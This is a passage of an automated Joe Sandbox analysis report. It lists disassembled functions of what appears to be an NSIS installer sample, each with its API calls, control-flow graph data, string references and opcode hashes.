                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                                                                              • String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                                                                                                                                              • API String ID: 608394941-1650083594
                                                                                                                                                                                                                                                                                              • Opcode ID: 0b5ab136357e203ee2e090d14ec2b93cf78a9c4147554daf2c52a3a548f14690
                                                                                                                                                                                                                                                                                              • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0b5ab136357e203ee2e090d14ec2b93cf78a9c4147554daf2c52a3a548f14690
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E
                                                                                                                                                                                                                                                                                              Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185stringtimeCOMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                                                • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                                              • lstrcatW.KERNEL32(00000000,00000000,open,004CB0B0,00000000,00000000), ref: 00401A76
                                                                                                                                                                                                                                                                                              • CompareFileTime.KERNEL32(-00000014,?,open,open,00000000,00000000,open,004CB0B0,00000000,00000000), ref: 00401AA0
                                                                                                                                                                                                                                                                                                • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                                                                                                                                                                                • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                                                                                                                                • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                                                                                                                                                                                • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                                                                                                                                                                                • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                                                                                                                                                                                • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                                                                                                                                                                                • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                                                                                                                                                                                • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                                                                                                                                                                              • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$open
                                                                                                                                                                                                                                                                                              • API String ID: 4286501637-2478300759
                                                                                                                                                                                                                                                                                              • Opcode ID: b155778cc10115f8d02ccc56e208397f172a866a515c636f57ea647fec07d827
                                                                                                                                                                                                                                                                                              • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b155778cc10115f8d02ccc56e208397f172a866a515c636f57ea647fec07d827
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE
                                                                                                                                                                                                                                                                                              Function 00403587 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                                              control_flow_graph 653 403587-4035d5 GetTickCount GetModuleFileNameW call 405e50 656 4035e1-40360f call 406009 call 406751 call 406009 GetFileSize 653->656 657 4035d7-4035dc 653->657 665 403615 656->665 666 4036fc-40370a call 4032d2 656->666 658 4037b6-4037ba 657->658 668 40361a-403631 665->668 672 403710-403713 666->672 673 4037c5-4037ca 666->673 670 403633 668->670 671 403635-403637 call 403336 668->671 670->671 677 40363c-40363e 671->677 675 403715-40372d call 403368 call 403336 672->675 676 40373f-403769 GlobalAlloc call 403368 call 40337f 672->676 673->658 675->673 703 403733-403739 675->703 676->673 701 40376b-40377c 676->701 679 403644-40364b 677->679 680 4037bd-4037c4 call 4032d2 677->680 685 4036c7-4036cb 679->685 686 40364d-403661 call 405e0c 679->686 680->673 689 4036d5-4036db 685->689 690 4036cd-4036d4 call 4032d2 685->690 686->689 700 403663-40366a 686->700 697 4036ea-4036f4 689->697 698 4036dd-4036e7 call 407281 689->698 690->689 697->668 702 4036fa 697->702 698->697 700->689 706 40366c-403673 700->706 707 403784-403787 701->707 708 40377e 701->708 702->666 703->673 703->676 706->689 709 403675-40367c 706->709 710 40378a-403792 707->710 708->707 709->689 711 40367e-403685 709->711 710->710 712 403794-4037af SetFilePointer call 405e0c 710->712 711->689 713 403687-4036a7 711->713 716 4037b4 712->716 713->673 715 4036ad-4036b1 713->715 717 4036b3-4036b7 715->717 718 4036b9-4036c1 715->718 716->658 717->702 717->718 718->689 719 4036c3-4036c5 718->719 719->689
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00403598
                                                                                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                                                                                                                                                                                                                                                                                • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                                                                                                                                                                                                                                • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                              • Null, xrefs: 0040367E
                                                                                                                                                                                                                                                                                              • soft, xrefs: 00403675
                                                                                                                                                                                                                                                                                              • Inst, xrefs: 0040366C
                                                                                                                                                                                                                                                                                              • Error launching installer, xrefs: 004035D7
                                                                                                                                                                                                                                                                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                                                                                                                              • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                                                                                                                              • API String ID: 4283519449-527102705
                                                                                                                                                                                                                                                                                              • Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                                                                                                                                                                                                                                              • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C
                                                                                                                                                                                                                                                                                              Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 166fileCOMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                                              control_flow_graph 720 40337f-403396 721 403398 720->721 722 40339f-4033a7 720->722 721->722 723 4033a9 722->723 724 4033ae-4033b3 722->724 723->724 725 4033c3-4033d0 call 403336 724->725 726 4033b5-4033be call 403368 724->726 730 4033d2 725->730 731 4033da-4033e1 725->731 726->725 732 4033d4-4033d5 730->732 733 4033e7-403407 GetTickCount call 4072f2 731->733 734 403518-40351a 731->734 735 403539-40353d 732->735 746 403536 733->746 748 40340d-403415 733->748 736 40351c-40351f 734->736 737 40357f-403583 734->737 739 403521 736->739 740 403524-40352d call 403336 736->740 741 403540-403546 737->741 742 403585 737->742 739->740 740->730 755 403533 740->755 744 403548 741->744 745 40354b-403559 call 403336 741->745 742->746 744->745 745->730 757 40355f-403572 WriteFile 745->757 746->735 751 403417 748->751 752 40341a-403428 call 403336 748->752 751->752 752->730 758 40342a-403433 752->758 755->746 759 403511-403513 757->759 760 403574-403577 757->760 761 403439-403456 call 407312 758->761 759->732 760->759 762 403579-40357c 760->762 765 40350a-40350c 761->765 766 40345c-403473 GetTickCount 761->766 762->737 765->732 767 403475-40347d 766->767 768 4034be-4034c2 766->768 769 403485-4034b6 MulDiv wsprintfW call 404f72 767->769 770 40347f-403483 767->770 771 4034c4-4034c7 768->771 772 4034ff-403502 768->772 778 4034bb 769->778 770->768 770->769 775 4034e7-4034ed 771->775 776 4034c9-4034db WriteFile 771->776 772->748 773 403508 772->773 773->746 777 4034f3-4034f7 775->777 776->759 779 4034dd-4034e0 776->779 777->761 781 4034fd 777->781 778->768 779->759 780 4034e2-4034e5 779->780 780->777 781->746
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 004033E7
                                                                                                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00403464
                                                                                                                                                                                                                                                                                              • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                                                                                                                                                                                                                                                                              • wsprintfW.USER32 ref: 004034A4
                                                                                                                                                                                                                                                                                              • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: CountFileTickWrite$wsprintf
                                                                                                                                                                                                                                                                                              • String ID: ... %d%%$P1B$X1C$X1C
                                                                                                                                                                                                                                                                                              • API String ID: 651206458-1535804072
                                                                                                                                                                                                                                                                                              • Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                                                                                                                                                                                                                                                              • Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9
                                                                                                                                                                                                                                                                                              Function 00404F72 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                                              control_flow_graph 782 404f72-404f85 783 405042-405044 782->783 784 404f8b-404f9e 782->784 785 404fa0-404fa4 call 406805 784->785 786 404fa9-404fb5 lstrlenW 784->786 785->786 788 404fd2-404fd6 786->788 789 404fb7-404fc7 lstrlenW 786->789 792 404fe5-404fe9 788->792 793 404fd8-404fdf SetWindowTextW 788->793 790 405040-405041 789->790 791 404fc9-404fcd lstrcatW 789->791 790->783 791->788 794 404feb-40502d SendMessageW * 3 792->794 795 40502f-405031 792->795 793->792 794->795 795->790 796 405033-405038 795->796 796->790
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                                                                                                                                                                              • lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                                                                                                                                                                              • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                                                                                                                                                                                • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                              • API String ID: 2740478559-0
                                                                                                                                                                                                                                                                                              • Opcode ID: 4a81920338a541d7bcc419c3bcbb2810a04374694b2a6e658d803f75c228445d
                                                                                                                                                                                                                                                                                              • Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4a81920338a541d7bcc419c3bcbb2810a04374694b2a6e658d803f75c228445d
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98
                                                                                                                                                                                                                                                                                              Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78COMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                                              control_flow_graph 797 401eb9-401ec4 798 401f24-401f26 797->798 799 401ec6-401ec9 797->799 800 401f53-401f7b GlobalAlloc call 406805 798->800 801 401f28-401f2a 798->801 802 401ed5-401ee3 call 4062a3 799->802 803 401ecb-401ecf 799->803 816 4030e3-4030f2 800->816 817 402387-40238d GlobalFree 800->817 805 401f3c-401f4e call 406009 801->805 806 401f2c-401f36 call 4062a3 801->806 814 401ee4-402702 call 406805 802->814 803->799 807 401ed1-401ed3 803->807 805->817 806->805 807->802 813 401ef7-402e50 call 406009 * 3 807->813 813->816 829 402708-40270e 814->829 817->816 829->816
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                                                                                                                                                                              • GlobalFree.KERNELBASE(00816E80), ref: 00402387
                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: FreeGloballstrcpyn
                                                                                                                                                                                                                                                                                              • String ID: Exch: stack < %d elements$Pop: stack empty$open
                                                                                                                                                                                                                                                                                              • API String ID: 1459762280-1711415406
                                                                                                                                                                                                                                                                                              • Opcode ID: 1882500a3a7973729244276bdae00bfd603f91a0f1c5eacb79451a398e12722f
                                                                                                                                                                                                                                                                                              • Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1882500a3a7973729244276bdae00bfd603f91a0f1c5eacb79451a398e12722f
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD
                                                                                                                                                                                                                                                                                              Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                                              control_flow_graph 832 4022fd-402325 call 40145c GetFileVersionInfoSizeW 835 4030e3-4030f2 832->835 836 40232b-402339 GlobalAlloc 832->836 836->835 837 40233f-40234e GetFileVersionInfoW 836->837 839 402350-402367 VerQueryValueW 837->839 840 402384-40238d GlobalFree 837->840 839->840 843 402369-402381 call 405f51 * 2 839->843 840->835 843->840
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                              • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                                                                                                                                                                              • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                                                                                                                                                                              • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                                                                                                                                                                                • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                                                                                                                                                                                                                              • GlobalFree.KERNELBASE(00816E80), ref: 00402387
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                              • API String ID: 3376005127-0
                                                                                                                                                                                                                                                                                              • Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                                                                                                                                                                                                                                                              • Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
